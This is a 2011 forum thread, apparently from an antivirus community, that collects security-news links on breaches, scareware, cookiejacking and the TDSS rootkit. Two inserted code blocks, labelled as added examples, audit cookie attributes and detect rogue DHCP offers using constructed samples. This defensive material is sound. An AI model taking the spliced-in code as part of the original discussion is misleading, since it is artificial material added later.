That title is a little misleading, IMHO...
-
Scams utilizing Google Music beta
http://www.norman.com/security_center/blog/per_olav_forland/146376/en-us
-
Scams utilizing Google Music beta
http://www.norman.com/security_center/blog/per_olav_forland/146376/en-us
As usual, "If it seems to good to be true, it probably is."
If you didn't apply for the invitation at Google and the reply didn't come directly from Google,
then don't go near the invitation.
-
Win7 Machines Harder Hit with Infection Rates Recently:
http://www.theregister.co.uk/2011/05/13/ms_threat_landscape_survey/
- Java-based exploits and phishing on social networks dominate
-
Windows 7 more malware-resistant than XP/Vista
Windows XP SP3 32-bit has an infection rate of 15.9 per thousand systems, while Windows Vista SP2 32-bit has half this infection rate, 7.5 per thousand. Windows 7 32-bit nearly halves this again to 3.8 per thousand, while Windows 7 64-bit managed to get the infection rate per thousand down to 2.5.
http://www.zdnet.com/blog/hardware/windows-7-more-malware-resistant-than-xpvista/12786
-
Win32/Alureon brings back old school virus techniques, enhanced
While working recently on different Win32/Alureon samples, we noticed some behaviour that deviated from what we’ve seen before. A particular set of files was taking longer to exhibit malicious behaviour than others. We started looking for why this was so, and ended up with a blast from the past. This time the malware was using Win32/Crypto-style decryption to elude anti-virus scanners.
Microsoft Malware Protection Center (http://blogs.technet.com/b/mmpc/archive/2011/05/15/win32-alureon-brings-back-old-school-virus-techniques-enhanced.aspx)
[via (http://threatpost.com/en_us/blogs/new-version-alureon-ups-ante-encryption-051611)]
-
Trojan Feigns Failures to Increase Rogue Defragger Sales (http://www.symantec.com/connect/blogs/trojan-feigns-failures-increase-rogue-defragger-sales)
-
Hackers getting smarter
One-in-14 downloads malicious: Microsoft:
http://www.theage.com.au/technology/security/onein14-downloads-malicious-microsoft-20110519-1etrg.html
-
Sony PSN again
http://sony.nyleveia.com/2011/05/17/warning-all-psn-users-your-accounts-are-still-not-safe/
-
Sony PSN again
http://sony.nyleveia.com/2011/05/17/warning-all-psn-users-your-accounts-are-still-not-safe/
Na, not really: http://blog.us.playstation.com/2011/05/18/update-on-psn-password-reset-process/
-
Sony PSN again
http://sony.nyleveia.com/2011/05/17/warning-all-psn-users-your-accounts-are-still-not-safe/
Na, not really: http://blog.us.playstation.com/2011/05/18/update-on-psn-password-reset-process/
Wouldn't feel too safe with Sony... ;)
http://www.f-secure.com/weblog/archives/00002160.html
Basically this means that Sony has been hacked, again.
-
Mac scareware becomes more visible
http://www.h-online.com/security/news/item/Mac-scareware-becomes-more-visible-1246693.html
http://www.bleepingcomputer.com/virus-removal/remove-mac-protector
http://www.bleepingcomputer.com/virus-removal/remove-mac-defender
-
New 64-Bit Rootkit Being Used to Steal Banking Credentials (http://threatpost.com/en_us/blogs/new-64-bit-rootkit-being-used-steal-banking-credentials-052011?utm_source=Newsletter_052011&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=&CID=)
-
Apple's Mac App Store Puts Users At Risk
http://security.thejoshmeister.com/2011/05/apples-mac-app-store-puts-users-at-risk.html
-
Mac scareware becomes more visible
http://www.h-online.com/security/news/item/Mac-scareware-becomes-more-visible-1246693.html
http://www.bleepingcomputer.com/virus-removal/remove-mac-protector
http://www.bleepingcomputer.com/virus-removal/remove-mac-defender
Winwebsec gang responsible for FakeMacdef?
http://blogs.technet.com/b/mmpc/archive/2011/05/17/winwebsec-gang-responsible-for-fakemacdef.aspx
-
LinkedIn SSL Cookie Vulnerability
http://www.wtfuzz.com/blogs/linkedin-ssl-cookie-vulnerability/
-
Kaspersky: Android is the new Windows
http://www.h-online.com/security/news/item/Kaspersky-Android-is-the-new-Windows-1248329.html
http://www.securelist.com/en/analysis/204792176/IT_Threat_Evolution_for_Q1_2011
-
Black Hole Exploit Kit Available for Free
http://threatpost.com/en_us/blogs/black-hole-exploit-kit-available-free-052311
-
New Hack on Comodo Reseller Exposes Private Data:
http://www.theregister.co.uk/2011/05/24/comodo_reseller_hacked/
-
New Hack on Comodo Reseller Exposes Private Data:
http://www.theregister.co.uk/2011/05/24/comodo_reseller_hacked/
Comodo president and CEO, Melih Abdulhayoglu, said Comodo systems were never compromised. He also said no certificates were issued as a result of the breach, and that the reseller had no access to Comodo databases.
“So as a summary: its an SQL attack (fairly common) on a company in Brazil who sells some of our products.” he wrote in an email. “Nothing to report really.”
-
Apple Plans Update to Address MacDefender Malware (http://threatpost.com/en_us/blogs/apple-plans-update-address-macdefender-malware-052511?utm_source=Newsletter_052511&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=&CID=)
Study: Android App Authentication Bug Affecting 99% of Users (http://threatpost.com/en_us/blogs/study-android-app-authentication-bug-affecting-99-users-052411?utm_source=Newsletter_052511&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=&CID=)
-
Mac scareware becomes more visible
http://www.h-online.com/security/news/item/Mac-scareware-becomes-more-visible-1246693.html
http://www.bleepingcomputer.com/virus-removal/remove-mac-protector
http://www.bleepingcomputer.com/virus-removal/remove-mac-defender
Winwebsec gang responsible for FakeMacdef?
http://blogs.technet.com/b/mmpc/archive/2011/05/17/winwebsec-gang-responsible-for-fakemacdef.aspx
Apple publishes Mac Defender removal details, promises fix
http://www.h-online.com/security/news/item/Apple-publishes-Mac-Defender-removal-details-promises-fix-1250118.html
Mac Defender variant doesn't require admin password
http://blog.intego.com/2011/05/25/intego-security-memo-new-mac-defender-variant-macguard-doesnt-require-password-for-installation/
-
Sony PSN again
http://sony.nyleveia.com/2011/05/17/warning-all-psn-users-your-accounts-are-still-not-safe/
Na, not really: http://blog.us.playstation.com/2011/05/18/update-on-psn-password-reset-process/
Wouldn't feel too safe with Sony... ;)
http://www.f-secure.com/weblog/archives/00002160.html
Basically this means that Sony has been hacked, again.
Attacks on Sony continue
http://www.h-online.com/security/news/item/Attacks-on-Sony-continue-1250130.html
http://www.pcworld.com/article/228597/sony_says_hacker_stole_2000_records_from_canadian_site.html
-
Internet Explorer: cookie theft made easy
http://www.h-online.com/security/news/item/Internet-Explorer-cookie-theft-made-easy-1250938.html
-
Internet Explorer: cookie theft made easy
http://www.h-online.com/security/news/item/Internet-Explorer-cookie-theft-made-easy-1250938.html
Since you can't eat these cookies, what exactly is he going to do with them ???
-
Since you can't eat these cookies, what exactly is he going to do with them ???
Hackers can exploit the flaw to access a data file stored inside the browser known as a "cookie," which holds the login name and password to a web account, Valotta said via email
Once a hacker has that cookie, he or she can use it to access the same site, said Valotta, who calls the technique "cookiejacking."
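Whatever the theft mechanism, what a stolen cookie is worth depends on how the server issued it, so the first thing to check after a report like the cookiejacking one above (or the "LinkedIn SSL Cookie Vulnerability" link further up) is the attributes on the site's Set-Cookie header. The audit below is an added example, not from the thread or either article; the headers it reads are constructed samples, not captured from any real site, and the 30-day "long-lived" threshold is an assumption chosen for illustration. Note that a flaw which reads the cookie file straight out of the browser, as the IE article describes, is not stopped by any of these flags; they bound what else can get at the cookie and, via Max-Age, how long a stolen one keeps working.

```shell
#!/bin/sh
# Added example (not from the thread): audit one Set-Cookie header for the
# attributes that decide what a stolen or sniffed session cookie is worth.
# The headers fed to it below are constructed samples, not captured from
# LinkedIn or any other site; the 30-day "long-lived" threshold is an
# assumption chosen for illustration.
audit_cookie() {  # $1 = value of one Set-Cookie header; prints findings or "ok"
  lowered=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
  has_secure=0; has_httponly=0; has_samesite=0; max_age=""
  old_ifs=$IFS; IFS=';'; set -f          # split on ';' only, no globbing
  for part in $lowered; do
    part=$(printf '%s' "$part" | sed 's/^ *//;s/ *$//')
    case "$part" in
      secure)     has_secure=1 ;;        # never sent over plain HTTP
      httponly)   has_httponly=1 ;;      # not readable from page script
      samesite=*) has_samesite=1 ;;      # not sent on cross-site requests
      max-age=*)  max_age=${part#max-age=} ;;
    esac
  done
  set +f; IFS=$old_ifs
  findings=""
  [ "$has_secure"   -eq 1 ] || findings="$findings missing-Secure"
  [ "$has_httponly" -eq 1 ] || findings="$findings missing-HttpOnly"
  [ "$has_samesite" -eq 1 ] || findings="$findings missing-SameSite"
  # A session token that stays valid for months keeps working long after a theft.
  if [ -n "$max_age" ] && [ "$max_age" -gt 2592000 ] 2>/dev/null; then
    findings="$findings long-lived"
  fi
  if [ -z "$findings" ]; then echo ok; else echo "${findings# }"; fi
}

# Constructed samples: a bare session cookie, a hardened one, and one that
# lives for a year.
for hdr in 'sid=abc123; Path=/' \
           'sid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax; Max-Age=3600' \
           'sid=abc123; Path=/; HttpOnly; Max-Age=31536000'; do
  echo "$hdr -> $(audit_cookie "$hdr")"
done
```

Run it against the Set-Cookie lines from a real response (for example, the headers curl prints with -I) to see which of the three findings apply.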
-
Google's Chrome Web Store Quietly Removes Nosy Apps that Invade Your Privacy:
http://www.theregister.co.uk/2011/05/26/google_web_store_privacy_threats/
-
Student collects 15 million Gmail addresses
http://www.h-online.com/security/news/item/Student-collects-15-million-Gmail-addresses-1251356.html
-
Large RRSIG RRsets and Negative Caching can crash named
http://www.isc.org/software/bind/advisories/cve-2011-1910
-
Allied Telesis divulges secret backdoor
http://www.h-online.com/security/news/item/Allied-Telesis-divulges-secret-backdoor-1251556.html
-
Chrome app security model is broken
http://blog.mobilephonesecurity.org/2011/05/chrome-app-security-model-is-broken.html
http://www.securitynewsdaily.com/data-swiping-super-mario-games-infiltrate-chrome-web-store-0818/
-
Sony PSN again
http://sony.nyleveia.com/2011/05/17/warning-all-psn-users-your-accounts-are-still-not-safe/
Na, not really: http://blog.us.playstation.com/2011/05/18/update-on-psn-password-reset-process/
Wouldn't feel too safe with Sony... ;)
http://www.f-secure.com/weblog/archives/00002160.html
Basically this means that Sony has been hacked, again.
Attacks on Sony continue
http://www.h-online.com/security/news/item/Attacks-on-Sony-continue-1250130.html
http://www.pcworld.com/article/228597/sony_says_hacker_stole_2000_records_from_canadian_site.html
Poor sony :'(
-
Poor sony :'(
Sorry, but are you serious..???
They should have better protected their servers, imo.
-
My avast antivirus, when I try automatic updates, gives me a message saying that it cannot connect to the server; this was 3 days ago and it's still doing it. It then reads a885he.avast.com, then (85.10.210.108.8080 to those updates. Can anyone be of help? I tried typing it into Google but can't find them????? Thanks in advance...
-
My avast antivirus, when I try automatic updates, gives me a message saying that it cannot connect to the server; this was 3 days ago and it's still doing it. It then reads a885he.avast.com, then (85.10.210.108.8080 to those updates. Can anyone be of help? I tried typing it into Google but can't find them????? Thanks in advance...
- Please start a New Topic of your own, as this is unrelated to the original subject and will just confuse the topic, and we will try to help.
- Go to this link, http://forum.avast.com/index.php?board=2.0. Click the New Topic button at the top of the list and post there.
-
- Please start a New Topic of your own...
Guess he/she did the best possible..!?? ;)
http://forum.avast.com/index.php?topic=78405.msg650914#msg650914
-
Hackers break into Lockheed Martin
http://www.h-online.com/security/news/item/Hackers-break-into-Lockheed-Martin-1251978.html
http://www.reuters.com/article/2011/05/28/usa-defense-hackers-idUSN2717936920110528
http://www.reuters.com/article/2011/05/29/us-usa-defense-hackers-idUSTRE74Q6VY20110529?irpc=932
-
Aussie Banks Cancel Credit Cards Due to Security Breach:
http://www.theregister.co.uk/2011/05/29/aus_banks_cancel_credit/
-
Skype installs third party software against users' wishes
http://www.h-online.com/security/news/item/Skype-installs-third-party-software-against-users-wishes-1252543.html
-
How many viruses are made by anti-virus companies?
http://www.emsisoft.com/en/kb/articles/tec110601/?utm_source=newsletter&utm_medium=newsletter&utm_content=tec110601&utm_campaign=news110525
-
Poor sony :'(
Sorry, but are you serious..???
They should have better protected their servers, imo.
Yes they should, but what can they do against 32402134 hackers who are targeting their company? ;D Reminds me of 300, the movie. ;D
-
How many viruses are made by anti-virus companies?
http://www.emsisoft.com/en/kb/articles/tec110601/?utm_source=newsletter&utm_medium=newsletter&utm_content=tec110601&utm_campaign=news110525
Good article. By the end, the argument could be the same as police and bad guys.
-
...but what can they do against 32402134 hackers who are targeting their company? ;D Reminds me of 300, the movie. ;D
These were not DoS attacks. ;)
-
Honda Canada loses 283,000+ records, now faces lawsuit
http://nakedsecurity.sophos.com/2011/05/29/honda-canada-loses-283000-records-now-faces-lawsuit/
-
Skype installs third party software against users' wishes
http://www.h-online.com/security/news/item/Skype-installs-third-party-software-against-users-wishes-1252543.html
We have already seen one topic on the forums where this EasyBits Go inclusion caused concerns of malware on a user system.
-
How many viruses are made by anti-virus companies?
http://www.emsisoft.com/en/kb/articles/tec110601/?utm_source=newsletter&utm_medium=newsletter&utm_content=tec110601&utm_campaign=news110525
I think that the article is nothing more than marketing hype, otherwise why is there the dirty big advert showing emsisoft getting 100% in an old MRG test from q3-q4 2010
-
How many viruses are made by anti-virus companies?
http://www.emsisoft.com/en/kb/articles/tec110601/?utm_source=newsletter&utm_medium=newsletter&utm_content=tec110601&utm_campaign=news110525
I would have to say----- none, zip, zero, nada
-
I think that the article is nothing more than marketing hype, otherwise why is there the dirty big advert showing emsisoft getting 100% in an old MRG test from q3-q4 2010
What would you expect they add on their site? A third party product?
The article is just as informative as any other on avast blog for instance imho ::)
-
All Internet Explorer browser versions allow cookiejacking
>>> http://www.ecommerce-journal.com/news/48203_all-internet-explorer-browser-versions-allow-cookiejacking <<<
-
Mac scareware becomes more visible
http://www.h-online.com/security/news/item/Mac-scareware-becomes-more-visible-1246693.html
http://www.bleepingcomputer.com/virus-removal/remove-mac-protector
http://www.bleepingcomputer.com/virus-removal/remove-mac-defender
Winwebsec gang responsible for FakeMacdef?
http://blogs.technet.com/b/mmpc/archive/2011/05/17/winwebsec-gang-responsible-for-fakemacdef.aspx
Apple publishes Mac Defender removal details, promises fix
http://www.h-online.com/security/news/item/Apple-publishes-Mac-Defender-removal-details-promises-fix-1250118.html
Mac Defender variant doesn't require admin password
http://blog.intego.com/2011/05/25/intego-security-memo-new-mac-defender-variant-macguard-doesnt-require-password-for-installation/
Apple addresses Mac Defender in Snow Leopard security update
http://www.h-online.com/security/news/item/Apple-addresses-Mac-Defender-in-Snow-Leopard-security-update-1253399.html
-
I think that the article is nothing more than marketing hype, otherwise why is there the dirty big advert showing emsisoft getting 100% in an old MRG test from q3-q4 2010
What would you expect they add on their site? A third party product?
The article is just as informative as any other on avast blog for instance imho ::)
What I would expect is the article without the attempt at the soft sell by including the old test results. Given the title of the blog, the marketing advert has nothing to do with the actual article.
So it is superfluous to the article, it didn't need the blatant marketing advert to make its point.
I have no problem with blog articles which are informative, just that this one when allied to a totally unconnected set of test results to me just makes it look like that was the whole purpose of the blog.
-
Apple addresses Mac Defender in Snow Leopard security update
http://www.h-online.com/security/news/item/Apple-addresses-Mac-Defender-in-Snow-Leopard-security-update-1253399.html
http://www.zdnet.com/blog/bott/new-apple-antivirus-signatures-bypassed-within-hours-by-malware-authors-update/3396
-
Apple addresses Mac Defender in Snow Leopard security update
http://www.h-online.com/security/news/item/Apple-addresses-Mac-Defender-in-Snow-Leopard-security-update-1253399.html
http://www.zdnet.com/blog/bott/new-apple-antivirus-signatures-bypassed-within-hours-by-malware-authors-update/3396
Apple's Mac Defender patch is already worthless (http://www.betanews.com/article/Apples-Mac-Defender-patch-is-already-worthless/1306953026?awesm=betane.ws_1B8&utm_content=api&utm_medium=betane.ws-twitter&utm_source=direct-betane.ws)
-
Facebook Attack Spreading both Windows AND Mac malware
http://www.f-secure.com/weblog/archives/00002172.html
There's a significant Facebook malware attack occurring at the moment.
The malware is using the Facebook "Likes" thumbs-up icon, but appears to be spreading via another method. Additional analysis suggests that the malware itself may be injecting a post into the victim's Facebook session.
Try as we might, our test account was not compromised by the attack server's webpage. We are now speculating that the Windows malware is a Koobface like worm with ZeuS like webinject capabilities. Our analysis continues.
-
Sony Pictures Falls Victim to Major Data Breach (http://www.pcworld.com/article/229303/sony_pictures_falls_victim_to_major_data_breach.html#tk.twt_pcw)
-
Attacks target high-profile Gmail accounts
http://www.h-online.com/security/news/item/Attacks-target-high-profile-Gmail-accounts-1254369.html
http://googleblog.blogspot.com/2011/06/ensuring-your-information-is-safe.html
http://contagiodump.blogspot.com/2011/02/targeted-attacks-against-personal.html
-
Sony Attacked Again, Passwords and Other Data Stolen (http://threatpost.com/en_us/blogs/sony-attacked-again-passwords-and-other-data-stolen-060311?utm_source=Newsletter_060311&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=&CID=)
-
Sony Attacked Again, Passwords and Other Data Stolen (http://threatpost.com/en_us/blogs/sony-attacked-again-passwords-and-other-data-stolen-060311?utm_source=Newsletter_060311&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=&CID=)
Ouch! :-X
-
How many viruses are made by anti-virus companies?
http://www.emsisoft.com/en/kb/articles/tec110601/?utm_source=newsletter&utm_medium=newsletter&utm_content=tec110601&utm_campaign=news110525
The blog fails to point out that a large number of new "viruses" are simply the same piece of malware rendered undetectable by being packaged or encrypted in some way.
There was a fuss a few years ago when an anti-virus company started creating new variants in this way and testing its own product against them.
Other AV companies complained that these fake viruses could find their way into AV testing virus collections and thus show them in a poor light for not detecting unreal viruses.
Possibly this story fed the urban myth somehow.
Somebody with a better memory might even remember which company it was...
(It wasn't avast!)
-
TDSS Rootkit boasts new DHCP server
http://www.theregister.co.uk/2011/06/03/tdss_self_propagation_powers/
A new version of the TDSS rootkit, which also goes by the names Alureon and TDL4, is able to infect new machines using two separate methods,
The second method is to spread over local area networks by creating a rogue DHCP server and waiting for attached machines to request an IP address. When the malware finds a request, it responds with a valid address on the LAN and an address to a malicious DNS server under the control of the rootkit authors. The DNS server then redirects the targeted machine to malicious webpages.
“After these manipulations, whenever the user tries to visit any web page, s/he will be redirected to the malicious server and prompted to update his/her web browser,” Golovanov wrote. “The user will not be able to visit websites until s/he agrees to install an 'update.'”
Late last year, TDSS acquired the ability to infect 64-bit versions of Microsoft Windows by bypassing the OS's kernel mode code signing policy. Researchers at security firm Prevx have said it's the most advanced rootkit ever seen in the wild. It is used as a backdoor to install and update keyloggers and other types of malware on infected machines, and once installed it's undetectable by most antimalware programs.
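A defender-side check for the rogue-DHCP behaviour described above, added here as an example (it is not code from the article or from anyone in this thread): it parses the options of a DHCP server reply and flags offers whose server identifier or DNS servers are not on an allowlist. The trusted addresses and both sample packets are constructed for the demonstration.

```python
"""Flag DHCP replies whose DNS option points at an unexpected server.

Minimal parser for the options section of a DHCP message (RFC 2131/2132
TLV layout after the magic cookie) plus an allowlist check. The trusted
addresses and the two packets below are constructed, not captured traffic.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

MAGIC_COOKIE = b"\x63\x82\x53\x63"
OPT_PAD, OPT_END = 0, 255
OPT_DNS = 6          # option 6: DNS server list, 4 bytes per address
OPT_MSG_TYPE = 53    # option 53: DHCP message type
OPT_SERVER_ID = 54   # option 54: address of the answering DHCP server
MSG_TYPES = {2: "OFFER", 5: "ACK"}


@dataclass
class DhcpReply:
    msg_type: str
    your_ip: str                 # yiaddr: the address handed to the client
    server_id: Optional[str]
    dns_servers: List[str] = field(default_factory=list)


def _ip(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def _ip_bytes(s: str) -> bytes:
    return bytes(int(x) for x in s.split("."))


def parse_options(raw: bytes) -> Dict[int, bytes]:
    """Walk code/length/value triples until END; reject truncated ones."""
    opts: Dict[int, bytes] = {}
    i = 0
    while i < len(raw):
        code = raw[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:
            i += 1
            continue
        if i + 1 >= len(raw):
            raise ValueError("truncated option header")
        length = raw[i + 1]
        val = raw[i + 2:i + 2 + length]
        if len(val) != length:
            raise ValueError("truncated option value")
        opts[code] = val
        i += 2 + length
    return opts


def parse_dhcp(pkt: bytes) -> DhcpReply:
    """Parse a BOOTP/DHCP server reply: 236-byte fixed header, cookie, options."""
    if len(pkt) < 240 or pkt[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message")
    if pkt[0] != 2:
        raise ValueError("not a server reply (op != BOOTREPLY)")
    opts = parse_options(pkt[240:])
    mt = opts.get(OPT_MSG_TYPE, b"")
    msg_type = MSG_TYPES.get(mt[0] if mt else -1, "OTHER")
    sid = opts.get(OPT_SERVER_ID)
    dns_raw = opts.get(OPT_DNS, b"")
    if len(dns_raw) % 4:
        raise ValueError("DNS option length not a multiple of 4")
    dns = [_ip(dns_raw[i:i + 4]) for i in range(0, len(dns_raw), 4)]
    return DhcpReply(msg_type, _ip(pkt[16:20]), _ip(sid) if sid else None, dns)


def rogue_indicators(reply: DhcpReply, trusted_servers, trusted_dns) -> List[str]:
    """Return human-readable findings; an empty list means the reply looks clean."""
    findings = []
    if reply.server_id is None:
        findings.append("no server identifier option")
    elif reply.server_id not in trusted_servers:
        findings.append(f"offer from unknown DHCP server {reply.server_id}")
    for d in reply.dns_servers:
        if d not in trusted_dns:
            findings.append(f"DNS server {d} not in allowlist")
    return findings


def build_reply(yiaddr: str, server_id: str, dns: List[str], msg_type: int = 2) -> bytes:
    """Construct a DHCP reply for testing (assumed layout, not real traffic)."""
    hdr = bytearray(236)
    hdr[0] = 2                       # BOOTREPLY
    hdr[16:20] = _ip_bytes(yiaddr)   # yiaddr
    dns_b = b"".join(_ip_bytes(d) for d in dns)
    opts = bytes([OPT_MSG_TYPE, 1, msg_type])
    opts += bytes([OPT_SERVER_ID, 4]) + _ip_bytes(server_id)
    opts += bytes([OPT_DNS, len(dns_b)]) + dns_b + bytes([OPT_END])
    return bytes(hdr) + MAGIC_COOKIE + opts


# Constructed allowlist for a hypothetical LAN whose gateway also serves DHCP/DNS.
TRUSTED_SERVERS = {"192.168.1.1"}
TRUSTED_DNS = {"192.168.1.1", "8.8.8.8"}

# Constructed samples: a legitimate offer, and one mimicking the TDSS pattern
# (valid LAN address handed out, but DNS pointed at an off-LAN host).
LEGIT = build_reply("192.168.1.50", "192.168.1.1", ["192.168.1.1"])
ROGUE = build_reply("192.168.1.51", "192.168.1.77", ["203.0.113.9"])


def check(pkt: bytes) -> List[str]:
    return rogue_indicators(parse_dhcp(pkt), TRUSTED_SERVERS, TRUSTED_DNS)


if __name__ == "__main__":
    for name, pkt in (("legit", LEGIT), ("rogue", ROGUE)):
        print(name, check(pkt) or ["ok"])
```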
-
Absolute Sownage: A concise history of recent Sony hacks
http://attrition.org/security/rants/sony_aka_sownage.html
-
Acer inadvertently releases 40,000 customer details
http://www.h-online.com/security/news/item/Acer-inadvertently-releases-40-000-customer-details-1255998.html
-
RSA finally comes clean: SecurID is compromised
http://arstechnica.com/security/news/2011/06/rsa-finally-comes-clean-securid-is-compromised.ars
http://www.rsa.com/node.aspx?id=3891
-
Allied Telesis divulges secret backdoor
http://www.h-online.com/security/news/item/Allied-Telesis-divulges-secret-backdoor-1251556.html
Allied Telesis – no backdoor in devices
http://www.h-online.com/security/news/item/Allied-Telesis-no-backdoor-in-devices-1257052.html
-
Fake anti-viruses for MAC, new 64-bit rootkits, and other "surprises" of May
http://news.drweb.com/show/?i=1706&lng=en&c=9
-
Pretty sure this is a false positive. Wish I could remember what piece of malware avast said it was trying to download on the system.
failblog.org
-
Microsoft Security Bulletin Advance Notification for June 2011
https://www.microsoft.com/technet/security/bulletin/ms11-jun.mspx
-
Prenotification: Quarterly Security Updates for Adobe Reader and Acrobat
http://blogs.adobe.com/psirt/2011/06/prenotification-quarterly-security-updates-for-adobe-reader-and-acrobat-3.html
-
http://nakedsecurity.sophos.com/2011/06/09/fake-anti-virus-cloaks-itself-to-appear-to-be-microsoft-update/
Fake anti-virus cloaks itself to appear to be Microsoft Update
We are seeing the criminals behind fake anti-virus continuing to customize their social engineering attacks to be more believable to users and presumably more successful.
Last week I wrote about fake Firefox malware warnings leading users to rogue security software. This week they've started to imitate Microsoft Update.......... (more)
This is very convincing, I have seen it on a laptop and it really does look like it is from Microsoft.
-
This is very convincing, I have seen it on a laptop and it really does look like it is from Microsoft.
However, you were using Firefox when it came up and Windows Update only works in IE.
-
This is very convincing, I have seen it on a laptop and it really does look like it is from Microsoft.
However, you were using Firefox when it came up and Windows Update only works in IE.
Good point Bob and also, you only see that page in XP. In Vista and I'm assuming 7 as well, you never actually go to the MS Update site so that would be a red flag for many as well.
-
Patch Tuesday heads-up: Critical holes in Windows, IE, MS Office
http://www.zdnet.com/blog/security/patch-tuesday-heads-up-critical-holes-in-windows-ie-ms-office/8739?tag=nl.e589
Critical Vulnerabilities in IE9 and Windows 7 SP1 to Be Patched Next Week
http://news.softpedia.com/news/Critical-Vulnerabilities-in-IE9-and-Windows-7-SP1-to-Be-Patched-Next-Week-205440.shtml
-
This is very convincing, I have seen it on a laptop and it really does look like it is from Microsoft.
However, you were using Firefox when it came up and Windows Update only works in IE.
No, I was not using Firefox, nor was the owner of the laptop. I loathe Firefox and avoid it wherever possible. The laptop's owner was using Safari at the time.
The point is there are millions of people that do not understand their systems that well and they ARE fooled by these things, if every user was 100% tech savvy there would be no need for any AV systems at all.
-
The point is there are millions of people that do not understand their systems that well and they ARE fooled by these things, if every user was 100% tech savvy there would be no need for any AV systems at all.
I highly doubt that being tech savvy would end your need for your security related software.
I do agree that this malware is very convincing and will fool the average computer user, which is why keeping your software totally up to date becomes more critical all the time.
Since the new malware always comes first, there is also no assurance of 100% protection, and those with some tech knowledge have a better chance of staying safe than those that have none.
-
The point is there are millions of people that do not understand their systems that well and they ARE fooled by these things, if every user was 100% tech savvy there would be no need for any AV systems at all.
I highly doubt that being tech savvy would end your need for your security related software.
+1
-
1234 is the most common iPhone passcode, app developer reveals (http://thenextweb.com/apple/2011/06/13/1234-is-the-most-common-iphone-passcode-app-developer-reveals/?utm_source=twitterfeed&utm_medium=feed&utm_campaign=Feed%3A+TheNextWeb+%28The+Next+Web+All+Stories%29)
-
1234 is the most common iPhone passcode, app developer reveals (http://thenextweb.com/apple/2011/06/13/1234-is-the-most-common-iphone-passcode-app-developer-reveals/?utm_source=twitterfeed&utm_medium=feed&utm_campaign=Feed%3A+TheNextWeb+%28The+Next+Web+All+Stories%29)
LOL, duh. /off-topic. ;D
-
Fake Firefox warnings lead to scareware
http://nakedsecurity.sophos.com/2011/05/30/fake-firefox-warnings-lead-to-scareware/
-
In all honesty, this isn't new, just another variant of the same theme, social engineering.
All the warnings in the world on stuff like this won't prevent the unwary or those not knowledgeable about their own system from being caught time and again. All things have to be taken with a degree of suspicion and a large dose of common sense.
How can something know your system is infected or be running a scan if you didn't actually download it and give it permission to run? Simple, it can't, and common sense should tell you that. After dashing round the room like a headless chicken for a while, don't click anything, and I do mean anything; use Task Manager to end all browser processes.
Now clear your temp files with something like CCleaner, then you can start to think about precautionary scans with avast, MBAM, etc.
Unfortunately, those people reading these security warnings, etc. are the least likely to have been tricked in the first place.
-
IMF attack "a very major breach"
http://www.h-online.com/security/news/item/IMF-attack-a-very-major-breach-1259469.html
http://www.bloomberg.com/news/2011-06-11/imf-computer-system-infiltrated-by-hackers-said-to-work-for-foreign-state.html
http://www.reuters.com/article/2011/06/13/us-imf-cyberattack-idUSTRE75A20720110613?feedType=RSS&feedName=topNews
-
Games companies under attack
http://www.h-online.com/security/news/item/Games-companies-under-attack-1259475.html
http://community.codemasters.com/forum/news-announcements-1300/announcements.html
http://forums.epicgames.com/showthread.php?t=799379
-
Hackers breached Citibank security using simple URL manipulation
http://www.h-online.com/security/news/item/Hackers-breached-Citibank-security-using-simple-URL-manipulation-Update-1260964.html
http://www.reuters.com/article/2011/06/16/us-citigroup-idUSTRE75F0RU20110616
-
LulzSec takes down the CIA web site
http://www.h-online.com/security/news/item/LulzSec-takes-down-the-CIA-web-site-1261838.html
-
I read the article but when I clicked on the highlighted link for Lulzsec.com, I got a blue screen that went too fast to read and the machine rebooted. No problems so far and scans have found nothing but I don't know how to see what caused the BsoD.
I'll try to attach the minidump file if any cares to help me find the cause.
BTW, those LulzSec people all need to be arrested.
-
unreadable ... in the worst case you are already a zombie :)
-
Meh, my main home machine did just fine when I clicked the link. Dunno what happened to yours.
-
FF4 - WebGL graphics memory stealing issue
http://blog.mozilla.com/security/2011/06/16/webgl-graphics-memory-stealing-issue/
-
I disabled WebGL in FF4 some time ago using the about:config settings when the 'first' warning about WebGL came out, see image.
I suggest those of you who haven't already done this, do so as an interim measure until it is resolved. Interestingly NoScript also has that option, but by default it is enabled, so it could be disabled there if you are using NoScript in FF4.
-
unreadable ... in the worst case you are already a zombie :)
No, I'm fine but to analyze the dump file you need a bunch of developer utilities that I just don't want to mess with. I thought maybe somebody had the capability and the time to analyze it for me. Just now I bravely clicked the link again and didn't have a problem. Probably just a glitch.
-
FF4 - WebGL graphics memory stealing issue
http://blog.mozilla.com/security/2011/06/16/webgl-graphics-memory-stealing-issue/
Hooray for the combination of Chrome and XP. WebGL is disabled by default. ;D
-
Trojan targets Bitcoin wallets
http://www.h-online.com/security/news/item/Trojan-targets-Bitcoin-wallets-1262715.html
-
Virgin alerts infected customers
http://www.bbc.co.uk/news/technology-13798122
-
Stuxnet: Computer Virus and Weapon...... a scary video
http://my.opera.com/portalnews/blog/2011/06/19/stuxnet-computer-virus-and-weapon
-
Dropbox security glitch meant any password worked yesterday
http://www.geek.com/articles/news/dropbox-security-glitch-meant-any-password-worked-yesterday-20110620/
thread on DropBox forums, no official comment yet:
http://forums.dropbox.com/topic.php?id=40113&replies=11#post-328320
... I first thought the guy (the OP) was a troll... well he's not... issue seems to be confirmed by others. See here too:
http://news.ycombinator.com/item?id=2674570
-
Thanks Logos. Seems a very weird behavior of Dropbox... I do not use it anymore but for an online backup, they should give security more attention...
-
Just been reading another old article about dropbox and privacy/security in one of my newsletters, Windows Secrets. I didn't pay it a lot of attention at the time as I don't use dropbox, but perhaps now it is even more relevant.
On-line article http://windowssecrets.com/top-story/re-examining-dropbox-and-its-alternatives/#story1
-
dropbox incident now officially confirmed: it lasted about 4 hours.
http://blog.dropbox.com/?p=821
-
dropbox incident now officially confirmed: it lasted about 4 hours.
http://blog.dropbox.com/?p=821
Good answer. Acknowledged, learned, improved.
